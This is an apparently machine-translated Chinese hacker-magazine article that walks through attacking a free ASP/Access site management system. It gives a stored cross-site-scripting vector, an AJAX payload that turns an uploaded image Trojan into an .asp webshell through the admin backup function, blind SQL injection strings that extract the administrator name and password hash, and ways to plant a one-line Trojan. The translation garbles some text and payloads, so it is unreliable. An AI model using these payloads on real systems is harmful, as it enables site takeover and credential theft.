Use or construct the SQL ingenious injection-analysis wise management systems security-vulnerability warning-the black bar safety net

ID MYHACK58:62201026745
Type myhack58
Reporter 佚名
Modified 2010-04-17T00:00:00


Title: the use or construct the SQL ingenious injection-analysis and wise management of the system security Author: By L4nk0r[] Source: L4nk0r'S Blog This article has been published in the hackers Handbook 2 0 0 9 year 1 0 issue of the magazine, after the author posted on the blog, such as reproduced please retain this information! L4nk0r:to facilitate everyone to read, and finally provides a file package to download

Preface: Recently on adrevmedia download a set of site management system,in the source home to find it,thought adrevmedia are recommended should the security is quite good. Official download the latest version of the local build IIS tested and found easy to use,overall security to do much good. Because it is a free version of,May the official a little water. But this does not affect our analysis,here discussed in two aspects:cross-site use,SQL injection. Or in a word:heavy in ideas. A. Hidden database The analysis code often have to With to the database(my analysis is the Access version) ,habitual open the database,surprised to find that only one notdown table,as shown in Figure 0 1: ! [Size: 58.02 K Size: 4 7 7 x 3 4 1 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-4/2010417145543229.jpg)

But take a closer look at the code found should not only this piece of the table,so they think it is not hidden? First saw this situation,so you see a lower Access Help instructions,in which found out that there also exist two kinds of attributes of the data table,i.e., the system objects and hidden objects. Following doing a small knowledge Supplement: Due to the Access default is to not display system objects and hidden objects. So if a table in the presence of hidden objects or system objects so you cannot see the table. Easy to say hiding under the method,the design table right click the table select"Properties"->"hidden"attribute ticked,refresh under see,this is hidden object,default is invisible. As for the System Object,we can modify the table with the prefix usys,so you can put the table into a system object. These two methods can be. Now that can be hidden of course, also can restore the display, press the following operation:“Tools”menu -- >“options”command-> View tab->select“Display”under“System Objects”check box or"hidden objects"check box, and press the“OK”button, you can re-display all the tables. As shown in Figure 0 2 ! [Size: 36.25 K Size: 5 0 0 x 2 3 6 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-4/2010417145546250.jpg)

Ok,the data can be and normal the same. II. Cross-site in-depth use. First look at the vulnerabilities in the file/include/PlS. asp,view the code found is a comment display,in the plurality of files is included,the code is as follows:

<% IF LePl<>"" then Dim Author,Content,mycode Author=Trim(Request. Form("Author"))// simple filtered spaces Content=Trim(Request. Form("Content")) //Ibid. mycode = trim(request. form("code")) if Author="" or Content="" then Call Alert ("please fill in the complete re-submission","-1") end if if mycode<>Session("getcode") then Call Alert ("you enter the CAPTCHA error","-1") end if set rs = server. CreateObject ("adodb. recordset") sql="select * from zhi_rui_E_Pl" rs. open sql,conn,1,3 rs. addnew rs("cli")=Request. Form("cli") rs("Ioid")=request. Form("Inid") rs("Author")=Author rs("Content")=Content ------------------------Omitted part of the code------------------------------- %>

Obviously without any filter,directly into the database,cross-site have been produced. Since the database is mdb format,all of the plug mA is useless. Here I think whether you can backup the database? Into the background to see the database backup,see in Figure 0 3: ! [Size: 16.11 K Size: 4 1 2 x 1 9 2 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-4/2010417145546610.jpg)

See no,database path and backup file name are not modified,some friends might here stop,in fact,can still,experience tells me,he is the the input box to write into a hidden hidden field,view the file/admin/Admin_Data. the asp code is as follows:

<td width="8 1%" bgcolor="#EBF2F9" class="td"><input name=DBpath type=Hidden id="DBpath" value="../DataBase/<%=DataName%>" size="4 0" /></td>

See this line of type=hidden,guess that's right. That is to say can also back up any files. All the background holding shell is relatively simple. (Plug horse back up the database more trouble,to bypass the<%loop<%in period I to tell you had to bypass the<%loop<%method)so as for the Cross Station how to use? Yes,with the ajax submit to the admin view comments on will automatically backup the database,but this database has the anti-download table leads to use up in trouble,in addition to the ordinary users have no way to upload any file,or else can by uploading a picture format of the Trojans,and then by cross-site use ajax to automatically backup files. This cross-site ACCess not use,in the MSSQL version you can think. As a technical discussion,I still give out the ajax code,假设 我 可以 上传 一 个 图片 格式 的 木马 upload/2009082150598817.jpg now I through the cross-site backup of this file into an asp file,through the analysis of the written code as follows(save the following code as l4nk0r. js uploaded to your website):

// Determine the browser type and definition create an xmlhttp session if (window. XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); } else if (window. ActiveXObject) { try { xmlhttp = new ActiveXObject("Msxml2. XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft. XMLHTTP"); } catch (e) { } } } function backup() { var postStr = "DBpath=upload/2 0 0 9 0 8 2 1 5 0 5 9 8 8 1 7. jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r. asp"; xmlhttp. open("POST","/admin/Admin_data. asp? action=RestoreData&act=Restore",true); xmlhttp. setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp. send(postStr); } Backup();

Then you have to submit places to submit so that when Admins see this comment it will trigger. But this loophole in this system is tasteless,just take this opportunity to share this idea. Here enters the main character discussion III. Use or construct the SQL to continue the injection Vulnerability file:admin/admin_cklogin. asp,backend login authentication file,find the injection vulnerability,the code is as follows:

LoginName=trim(request. form("LoginName")) LoginPassword=Md5(request. form("LoginPassword")) mycode = trim(request. form("code")) set rs = server. createobject("adodb. recordset") ‘ It is obvious injection vulnerability,the variable loginname is not filtered directly Execute sql statements ‘Note that the loginname is to use 2 single quotation marks. Note that before and after the closed question. sql="select * from zhi_rui_E_manage where AdminName='"&LoginName&"'" rs. open sql,conn,1,3

if rs. eof then response. write "<script language=javascript> alert('the administrator name is incorrect, please re-enter.'); location. replace('Admin_Login. asp');</script>" response. end else AdminName=rs("AdminName") Password=rs("Password") AdminPurview=rs("AdminPurview") Working=rs("Working") UserName=rs("UserName") end if

if LoginPassword<>Password then response. write "<script language=javascript> alert('admin password incorrect, please re-enter.'); location. replace('Admin_Login. asp');</script>" response. end end if

Well,the injection principle is not nonsense directly into the use. View database administrator table by default only one administrator,and the administrator user name can be modified. If the default administrator does not modify the can use the and statement to the injection,this injection statements is also relatively simple,not discussed here. Taking into account the versatility if the modification? The front Desk is not a place where you can find the administrator username of the traces. Well...then we'll talk about how to use or to inject the(non-universal password,does not work.). First, is injected into result there are 3 kinds: 1. Prompt”the administrator name is incorrect, please re-enter”,and the description of the injected statement is not the right structure or the right structure, but sql is not satisfied; 2. The prompt” admin password incorrect, please re-enter”,and the description of the injection of the statement was established; 3. Jump directly to Admin_Cklogin. asp display blank page,that means your password is also correct. This situation is basically impossible,but also not so strenuous. The analysis of this sql statement

sql="select * from zhi_rui_E_manage where AdminName='"&LoginName&"'"

Variable name with 2 single quotes included,it must be noted that the closure,as long as the SQL is established it will be properly injected,then we use or inject will want to how to meet these conditions? Yes,let the foregoing is false,or after is true that our injection statements,the last one or is a closing symbol and is false,the overall logic is False or true or false ->result is true,prompt for password error False or false or false ->result is false,username error ok the principle idea of the understand,can be constructed the following SQL statement.

(1) 1' or (select count(*) from zhi_rui_E_manage)>2 or '1'='2 (The determination whether the administrator is greater than 2) (2) 1' or (select asc(mid(adminname,1,1)) from zhi_rui_E_manage where id=1)>9 6 or '1'='2(The determination of id=1, username the first letter of the ASCII code for a,followed by the transposition of the judgment can give the administrator user name) (3) 1' or (select asc(mid(password,1,1)) from zhi_rui_E_manage where id=1)>9 6 or '1'='1 (Determine the id=1 The administrator password of the MD5 hash of the first character's ASCII code is greater than 9 and 6,similarly in order to determine can be obtained 3 2-bit MD5 hash)

Above and if successful, how return as shown in Figure 0 4, ! [Size: 22.42 K Size: 4 1 9 x 2 0 5 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-4/2010417145547527.jpg)

If unsuccessful returns as shown in Figure 0 5


So the patience to manually guess the solution is to give the administrator name and password. As for the background holding a shell,in many ways,I mention two relatively simple methods: 1. Site profile plug horse In the configuration file is just an information filled


And then directly access/include/config. the asp file is the word Trojan address. 2. Upload a picture format of the Trojan,and upload using the Local Backup get webshell Of course there are a lot of good ideas that we can provide the test method. Not repeat them here. The end of the article: The article ends here,hope you have too. Have any comments or technical discussions welcome to the AC,I Forum ID:L4nk0r

Image attachment: ! [Size: 46.7 K Size: 4 8 9 x 4 2 5 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-4/2010417145547470.jpg)